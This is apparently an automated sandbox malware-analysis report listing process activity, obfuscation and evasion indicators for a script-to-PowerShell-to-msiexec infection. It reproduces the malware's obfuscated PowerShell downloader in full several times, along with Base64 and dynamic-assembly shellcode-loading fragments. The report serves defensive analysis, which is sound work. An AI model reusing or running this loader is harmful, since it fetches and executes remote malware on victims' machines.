Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: wkernel32.pdb source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2132386041.0000000008750000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='D", "Unsupported parameter type 00000000")
Source: Yara match File source: 00000008.00000002.2135880774.0000000009729000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2135088634.0000000008CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2113268820.0000000005FDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tenutos)$GlObAl:pROgRAMUDfRELSEN = [SYsTEM.TeXT.eNcodiNG]::AsCIi.GetsTRINg($ReALKreDiT)$GloBAl:nOnGasSY=$programUDfReLSen.SubSTring($bortfALdes50,$rULLE)<#Impignorate Yoder Pennigero
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Erhversindkomster $Manihot $kneelingly), (israelitize @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Stikprvevarianternes = [AppDomain]::CurrentDomain.Get
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Piggier)), $Originalsprog).DefineDynamicModule($Gonozooid, $false).DefineType($Senat, $Interneringens, [System.MulticastDelegate])$Vul
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tenutos)$GlObAl:pROgRAMUDfRELSEN = [SYsTEM.TeXT.eNcodiNG]::AsCIi.GetsTRINg($ReALKreDiT)$GloBAl:nOnGasSY=$programUDfReLSen.SubSTring($bortfALdes50,$rULLE)<#Impignorate Yoder Pennigero
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B9E3322 push eax; retf 3_2_00007FFD9B9E3331
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB8414 push es; ret 3_2_00007FFD9BAB860A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB7004 push es; ret 3_2_00007FFD9BAB7002
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB6FD9 push es; ret 3_2_00007FFD9BAB7002
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB820A push es; ret 3_2_00007FFD9BAB820C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB84C2 push es; ret 3_2_00007FFD9BAB860A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_04D62517 push ebp; retn 0007h 8_2_04D62522
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_04D62527 push esi; retn 0007h 8_2_04D62532
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A3A00 push ebp; iretd 10_3_041A3A04
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A2401 push esi; iretd 10_3_041A2405
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A2232 pushfd ; iretd 10_3_041A2235
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A2890 pushfd ; retf 10_3_041A2891
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A38D2 push edx; retf 10_3_041A38E0
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A03A2 pushfd ; retf 10_3_041A040D
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A29C0 pushfd ; iretd 10_3_041A29C1
                        Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_3_041A39F5 push esp; ret 10_3_041A39F6
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C4920 push 0000002Eh; iretd 11_3_032C4922
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C5F0C push es; iretd 11_3_032C5F0D
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C1179 push FFFFFF82h; iretd 11_3_032C117B
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C278B push ebx; ret 11_3_032C28E4
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C5FEE push FFFFFFD2h; retf 11_3_032C6011
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C0FEA push eax; ret 11_3_032C0FF5
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C5606 pushad ; retf 11_3_032C5619
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C6012 push 00000038h; iretd 11_3_032C601D
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C225D push eax; ret 11_3_032C225F
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C58BC pushad ; ret 11_3_032C58C1
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C588E push eax; iretd 11_3_032C589D
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C28ED push ebx; ret 11_3_032C28E4
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_3_032C18C0 push ebp; retf 11_3_032C18C1
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B812D0 push eax; ret 11_2_05B812FE
                        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
Source: C:\Windows\SysWOW64\msiexec.exe; API/Special instruction interceptor: Address: 7FFE2220D044
Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 7FFE2220D044
Source: C:\Windows\SysWOW64\svchost.exe; API/Special instruction interceptor: Address: 5B8B83A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4823
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 8440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1238
Source: C:\Windows\System32\wscript.exe TID: 6416; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2500; Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor (2 entries)
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000003.1773192384.000001CE97F43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1774374835.000001CE97F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773788156.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741652492.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741505742.000001CE97F29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773836255.000001CE97F69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1772993678.000001CE97F38000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWP
Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWp
Source: powershell.exe, 00000003.00000002.1987068486.0000016E7F670000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWar%SystemRoot%\system32\mswsock.dllgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y
Source: msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: DisableGuestVmNetworkConnectivity
Source: wscript.exe, 00000000.00000003.1741711461.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773359836.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742554516.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1740851349.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743221651.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1774672446.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742983945.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741541718.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2203269463.0000000000617000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1774255669.000001CE97F38000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\udiara
Source: msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: EnableGuestVmNetworkConnectivity
Source: C:\Windows\System32\wbem\WMIC.exe; Process information queried: ProcessInformation

